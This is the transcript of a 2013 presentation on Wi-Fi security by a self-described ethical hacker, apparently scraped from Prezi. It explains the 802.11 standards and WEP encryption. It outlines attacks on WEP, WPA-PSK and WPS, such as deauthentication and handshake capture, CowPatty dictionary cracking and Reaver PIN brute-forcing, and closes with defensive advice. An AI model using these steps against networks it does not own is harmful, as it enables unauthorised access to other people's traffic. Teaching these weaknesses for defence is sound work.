Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

Wi-Fi Sec Null

No description
by

Vikas Jain

on 25 August 2013

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of Wi-Fi Sec Null

Wi-Fi Security
Open
Obviously not advised
Everyone has access to the network and hence your data
WPA
WPA2
Significant improvements to WPA
Strong encryption and authentication support
Advised to use in almost all environments
WEP
W
What is ?
h
t
a
i
s
?
W
i
-
F
i
Wi-Fi AKA Wireless Fidelity.
The Idea of Wireless networks emerged as early as 1985


WiFi is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves
The Wi-Fi Alliance
A trade association
Promotes Wi-Fi technology
Certifies Wi-Fi products if they conform to certain standards of interoperability.
Owns the Wi-Fi trademark

Wi-Fi: Standards
54 Mbps@2.4 Ghz
Same range as 802.11b
Backward-compatible with 802.11b
Speeds slower in dual-mode
attempts to combine the best of both 802.11a and 802.11b

11 Mbps@2.4 Ghz
Full speed up to 300 feet
Coverage up to 1750 feet
July 1999
54 Mbps@5 Ghz
Not interoperable with 802.11b
Limited distance
Dual-mode APs require 2 chipsets, look like two APs to clients

The Wi-Fi Alliance defines Wi-Fi as any "wireless local area network (WLAN) products that are based on the Institute of Electrical and Electronics Engineers' (IEEE) 802.11 standards"

Only Wi-Fi products that complete Wi-Fi Alliance interoperability certification testing successfully may use the "Wi-Fi CERTIFIED" trademark!!!
802.11a
802.11b
802.11g
802.11i
Adds AES encryption
Requires high cpu, new chips required
TKIP is interim solution

802.11n
100Mbps+
Designed to improve on 802.11g in the amount of bandwidth supported by utilizing multiple wireless signals and antennas (called MIMO technology) instead of one
Offers somewhat better range over earlier Wi-Fi standards due to its increased signal intensity.
Equipment backward compatible with 802.11g gear

Subset of 802.11i, forward-compatible with 802.11i (WPA2)
Encryption: Version one uses TKIP
AuthC: 802.1x & EAP – allows auth via RADIUS, also allows auth via PSK

Wi-Fi Protected Access (WPA) enabled Version of 802.11i
What do we Use Wi-Fi for?
Secure?
LAN
Let's See..
Wi-Fi
Signal travels through Air => visible to everyone
But is it accessible to everyone?
WHY?
GLOSSARY
SSID/Essid
BSSID
Channel
WLAN Packet
Beacons/frames
Packet Injection
Monitor mode

No Security configured
Wi-Fi protected Access: Advanced
Works with old hardware (the same as WEP)
Aimed at improving WEP without changing hardware
Uses TKIP (Temporal Key Integrity Protocol)
Wired equivalant privacy
WEP - How to Crack!!!
WEP: Intro
How it Works?
Wep Encryption
WEP Decryption
The original native security mechanism for WLAN
provide security through a 802.11 network
Used to protect wireless communication from eavesdropping (confidentiality)
Prevent unauthorized access to a wireless network (access control)
Prevent tampering with transmitted messages
Provide users with the equivalent level of privacy to wired LAN inbuilt in wireless networks.

Appends a 32-bit CRC checksum to each outgoing frame (INTEGRITY)

Encrypts the frame using RC4 stream cipher = 40-bit (standard) or 104-bit (Enhanced) message keys + a 24-bit IV random initialization vector (CONFIDENTIALITY).

The
Initialization Vector (IV)
and default key on the station access point are used to create a key stream

The key stream is then used to convert the plain text message
into the WEP encrypted frame.

Step 1
Step 2
The Key Scheduling Algorithm (KSA)
Involves creating a scrambled state array

This state array will now be used as input in the second phase, called the PRGA phase.
The Pseudo Random Generation Algorithm (PRGA):

The state array from the KSA process is used here to generate a final key stream.
Each byte of the key stream generated is then Xor’ed with the corresponding plain text byte to produce the desired cipher text.

Desired Cipher
OR
Encrypted Passphrase
ICV (Integrity Check Value)= CRC32 (cyclic redundancy check) integrity check

XOR operation
defined as
plain-text XOR keystream= cipher-text
cipher-text XOR keystream= plain-text
plain-text XOR cipher-text= keystream

The Initialization Vector
WEP encrypted networks can be cracked in 10 minutes
Goal is to collect enough IVs to be able to crack the key
IV = Initialization Vector, appended to the encrypted data as plaintext
Injecting packets generates IVs
Popular WEP Attacks
ARP REPLAY ATTACK
FRAG ATTACK
CHOP CHOP
CAFFE LATTE
WPA/WPA2 - How to PAWN!!!
WPA: Intro
WPA2 - Intro
Based on the IEEE 802.i standard
2 versions: Personal & Enterprise
The primary enhancement over WPA is the use of the AES (Advanced Encryption Standard) algorithm
The encryption in WPA2 is done by utilizing either AES or TKIP
The Personal mode uses a PSK (Pre-shared key) & does not require a separate authentication of users
The enterprise mode requires the users to be separately authenticated by using the EAP protocol

WPA/WPA2 Attacks
Data encrypted using the RC4 stream cipher, with a 128-bit key & a 48-bit initialization vector (IV).
Temporal Key Integrity Protocol (TKIP) dynamically changes keys as the system is used: major improvement in WPA over WEP
When combined with the much larger IV, this defeats the well-known key recovery attacks on WEP
Weakest of all: Not recommended
Limitation: Only Hexadecimal Passwords accepted => no special characters
Methods to break were devised years ago
takes less than 15 mins to break in!!

WPA 2 WEAKNESS
Can’t protect against layer session hijacking

Can’t stand in front of the physical layer attacks
RF jamming
Data flooding
Access points failure
Vulnerable to the Mac addresses spoofing

WPA-PSK protected networks are vulnerable to dictionary attacks
To Do:-
Spoof the Mac address of the AP and tell client to disassociate
Sniff the wireless network for the WPA-PSK handshake
Speedup!!!
Use GenPMK to create PMK

Run CowPatty against handshake to crack the key

Needs SSID to crack the WPA-PSK; easily obtainable!

Also supports WPA2-PSK cracking with the same pre-computed tables!

DEMO
It’s the Little password Button thingy.
Easiest way by far to break WPA-2
It is an 8 Digit numeric pin
8th digit is checksum i.e 10^7 + 10 combinations
Some routers you don’t have option to disable or change it.
Attacker require couple of hours to crack in
Created by the Wi-Fi Alliance and introduced in 2006
WPS
Tools
Wash

Reaver
CowPatty

Gen-PMK
Advice for Victims
Wi-Fi Security
Vikas Jain
I AM
A Security Cunsultant
A Network security Engineer
A passionate
Ethical
Hacker
A Brief History of mine
Born
Bikaner,
Rajasthan
SS Engr.
@
APPIN
Hyderabad
Security Analyst @ Cartel Software
Where can we find Wi-Fi?
What do we Use Wi-Fi for?
Steps to hack lan!
locate for the victims' network wire pole
Get up on the pole; keep your crimper handy!
Find the hard wire
Cut from between
fit a jack
Enjoy Hacking!!
ESSID = HackMeIfUCan
Don't Ever do that
My
Pleasure
Use Https instead of Http
DO's
Use Vpn For extra protection
Lower your router Tx power to Minimum
Use password with random character & symbols. keep it long as you can remember
If possible Disable WPS or FLASH router with dd-wrt
DO'NT's
Never use same password everywhere
Never shop on Public Wi-Fi , Don’t even use them
CEH Trainer @ Jagsar Int.
HACKS COMPLETE!!!
Questions?
Full transcript